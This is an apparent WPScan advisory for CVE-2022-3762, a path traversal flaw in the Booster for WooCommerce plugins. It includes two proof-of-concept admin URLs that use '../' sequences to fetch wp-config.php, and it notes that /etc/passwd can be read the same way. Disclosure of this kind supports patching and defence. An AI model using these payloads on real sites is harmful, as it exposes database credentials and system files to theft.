WordPress Plugin Vulnerabilities

Booster for WooCommerce - ShopManager+ Arbitrary File Download

Description

The plugins do not validate files to download in some of its modules, which could allow ShopManager and Admin to download arbitrary files from the server even when they are not supposed to be able to (for example in multisite)

Proof of Concept

Enable the "Checkout File Upload" module and open the following URL as a shop manager or admin: https://example.com/wp-admin/?wcj_download_checkout_file_admin=../../../../../wp-config.php&post=1&wcj_checkout_file_number=1 (the post and wcj_checkout_file_number parameters are irrelevant)

Enable the "Product Init Fields" module and open the following URL as a shop manager or admin: http://example.com/wp-admin/?wcj_download_file=../../../../../wp-config.php

System files such as /etc/passwd can also be retrieved that way

Affects Plugins

Plugin icon
woocommerce-jetpack
Fixed in 5.6.7
Plugin icon
booster-plus-for-woocommerce
Fixed in 5.6.5
Plugin icon
booster-elite-for-woocommerce
Fixed in 1.1.7

References

CVE
CVE-2022-3762

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
5.8 (medium)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
96ef4bb8-a054-48ae-b29c-b3060acd01ac

Timeline

Publicly Published
2022-10-31 (about 1 years ago)
Added
2022-10-31 (about 1 years ago)
Last Updated
2022-11-02 (about 1 years ago)

Other

Published
Title
Published
2022-09-15
Title
SearchWP Live Ajax Search < 1.6.3 - Unauthenticated Local File Inclusion
Published
2022-09-14
Title
Enable Media Replace < 4.0.0 - Admin+ Path Traversal
Published
2019-03-07
Title
Caldera Forms Pro < 1.8.2 - Unauthenticated Arbitrary File Read
Published
2019-10-11
Title
ArForms < 4.0 - Unauthenticated Arbitrary File Deletion via Traversal
Published
2023-02-28
Title
GMace <= 1.5.2 - Admin+ Path Traversal